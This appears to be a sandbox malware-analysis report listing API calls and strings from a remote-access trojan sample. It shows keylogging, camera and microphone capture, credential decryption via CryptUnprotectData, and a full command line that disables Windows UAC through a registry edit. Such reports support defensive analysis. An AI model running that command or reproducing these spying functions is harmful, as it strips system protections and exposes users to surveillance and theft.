                        • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                        • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                        • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                        • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                        • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                        • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                        • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                        • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                        • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ControlManager
                        • String ID:
                        • API String ID: 221034970-0
                        • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                        • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                        • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                        • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                        APIs
                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                        • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                        • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseCreateHandleSizeSleep
                        • String ID: h G
                        • API String ID: 1958988193-3300504347
                        • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                        • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                        • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                        • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                        APIs
                        • RegisterClassExA.USER32(00000030), ref: 0041B310
                        • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                        • GetLastError.KERNEL32 ref: 0041B335
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ClassCreateErrorLastRegisterWindow
                        • String ID: 0$MsgWindowClass
                        • API String ID: 2877667751-2410386613
                        • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                        • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                        • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                        • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                        APIs
                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                          • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                        • _UnwindNestedFrames.LIBCMT ref: 00437631
                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                        • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                        • String ID: /zC
                        • API String ID: 2633735394-4132788633
                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                        • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                        APIs
                        • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                        • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                        • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                        • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: MetricsSystem
                        • String ID: ]tA
                        • API String ID: 4116985748-3517819141
                        • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                        • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                        • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                        • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                        APIs
                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                        Strings
                        • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseHandle$CreateProcess
                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                        • API String ID: 2922976086-4183131282
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                        • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        APIs
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                        • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                        • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        Strings
                        • Connection KeepAlive | Disabled, xrefs: 004050D9
                        Similarity
                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                        • String ID: Connection KeepAlive | Disabled
                        • API String ID: 2993684571-3818284553
                        APIs
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                        • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                        • Sleep.KERNEL32(00002710), ref: 00418DBD
                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                        Similarity
                        • API ID: PlaySound$HandleLocalModuleSleepTime
                        • String ID: Alarm triggered
                        • API String ID: 614609389-2816303416
                        APIs
                        • Sleep.KERNEL32(00000000,?), ref: 004044A4
                          • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                        Similarity
                        • API ID: H_prologSleep
                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                        • API String ID: 3469354165-3547787478
                        APIs
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • _free.LIBCMT ref: 00442318
                        • _free.LIBCMT ref: 0044232F
                        • _free.LIBCMT ref: 0044234E
                        • _free.LIBCMT ref: 00442369
                        • _free.LIBCMT ref: 00442380
                        Similarity
                        • API ID: _free$AllocateHeap
                        • String ID:
                        • API String ID: 3033488037-0
                        APIs
                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                        • _free.LIBCMT ref: 004468EC
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 00446AB8
                        Similarity
                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                        • String ID:
                        • API String ID: 1286116820-0
                        Similarity
                        • API ID: _free
                        • String ID:
                        • API String ID: 269201875-0
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                        • __alloca_probe_16.LIBCMT ref: 0044E391
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                        • __freea.LIBCMT ref: 0044E3FD
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID:
                        • API String ID: 313313983-0
                        APIs
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BD9
                        • waveInOpen.WINMM(0046FAB0,000000FF,0046FA98,Function_00001CEB,00000000,00000000,00000024), ref: 00401C6F
                        • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401CC3
                        • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401CD2
                        • waveInStart.WINMM ref: 00401CDE
                        Similarity
                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                        • String ID:
                        • API String ID: 1356121797-0
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 0044C543
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044C566
                          • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044C58C
                        • _free.LIBCMT ref: 0044C59F
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044C5AE
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        APIs
                        • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                        • WriteFile.KERNEL32(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                        • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                        Similarity
                        • API ID: File$CloseHandle$CreatePointerWrite
                        • String ID:
                        • API String ID: 1852769593-0
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBD5
                        • int.LIBCPMT ref: 0040FBE8
                          • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                          • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                        • std::_Facet_Register.LIBCPMT ref: 0040FC28
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC31
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC4F
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                        • String ID:
                        • API String ID: 2536120697-0
                        APIs
                        • _free.LIBCMT ref: 0044DBB4
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 0044DBC6
                        • _free.LIBCMT ref: 0044DBD8
                        • _free.LIBCMT ref: 0044DBEA
                        • _free.LIBCMT ref: 0044DBFC
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        APIs
                        • _free.LIBCMT ref: 00441566
                          • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                          • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                        • _free.LIBCMT ref: 00441578
                        • _free.LIBCMT ref: 0044158B
                        • _free.LIBCMT ref: 0044159C
                        • _free.LIBCMT ref: 004415AD
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        APIs
                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C
                        Similarity
                        • API ID: Enum$InfoQueryValue
                        • String ID: [regsplt]
                        • API String ID: 3554306468-4262303796
                        APIs
                        • _strpbrk.LIBCMT ref: 0044B918
                        • _free.LIBCMT ref: 0044BA35
                          • Part of subcall function 00439AA3: IsProcessorFeaturePresent.KERNEL32(00000017,00439A75,?,?,?,?,?,00000000,?,?,00439A95,00000000,00000000,00000000,00000000,00000000), ref: 00439AA5
                          • Part of subcall function 00439AA3: GetCurrentProcess.KERNEL32(C0000417), ref: 00439AC7
                          • Part of subcall function 00439AA3: TerminateProcess.KERNEL32(00000000), ref: 00439ACE
                        Similarity
                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                        • String ID: *?$.
                        • API String ID: 2812119850-3972193922
                        Similarity
                        • API ID: __alloca_probe_16__freea
                        • String ID: H"G$H"GH"G
                        • API String ID: 1635606685-3036711414
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0040189E
                        • ExitThread.KERNEL32 ref: 004018D6
                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4
                          • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                        Similarity
                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                        • String ID: 8:G
                        • API String ID: 1649129571-405301104
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe,00000104), ref: 00440975
                        • _free.LIBCMT ref: 00440A40
                        • _free.LIBCMT ref: 00440A4A
                        Similarity
                        • API ID: _free$FileModuleName
                        • String ID: C:\Users\user\AppData\Roaming\ZRuVeAoBoxootS.exe
                        • API String ID: 2506810119-415676320
                        APIs
                          • Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                          • Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                          • Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054
                          • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                        • _wcslen.LIBCMT ref: 00419744
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                        • String ID: .exe$program files (x86)\$program files\
                        • API String ID: 37874593-1203593143
                        APIs
                        • CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
                        • CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
                        • CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7
                          • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTimewsprintf
                        • String ID: Offline Keylogger Started
                        • API String ID: 465354869-4114347211
                        • Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                        • Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
                        • Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
                        • Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF
                        APIs
                          • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                          • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                        • CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
                        • CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
                        • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateThread$LocalTime$wsprintf
                        • String ID: Online Keylogger Started
                        • API String ID: 112202259-1258561607
                        • Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                        • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                        • Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
                        • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                        APIs
                        • GetLocalTime.KERNEL32(?), ref: 00404F61
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                        • CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0
                        Strings
                        • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Create$EventLocalThreadTime
                        • String ID: Connection KeepAlive | Enabled | Timeout:
                        • API String ID: 2532271599-507513762
                        • Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                        • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                        • Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
                        • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA
                        APIs
                        • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                        • GetProcAddress.KERNEL32(00000000), ref: 00406097
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: CryptUnprotectData$crypt32
                        • API String ID: 2574300362-2380590389
                        • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                        • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                        • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                        • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                        • CloseHandle.KERNEL32(?), ref: 004051AA
                        • SetEvent.KERNEL32(?), ref: 004051B9
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandleObjectSingleWait
                        • String ID: Connection Timeout
                        • API String ID: 2055531096-499159329
                        • Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                        • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                        • Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
                        • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                        APIs
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Exception@8Throw
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 2005118841-1866435925
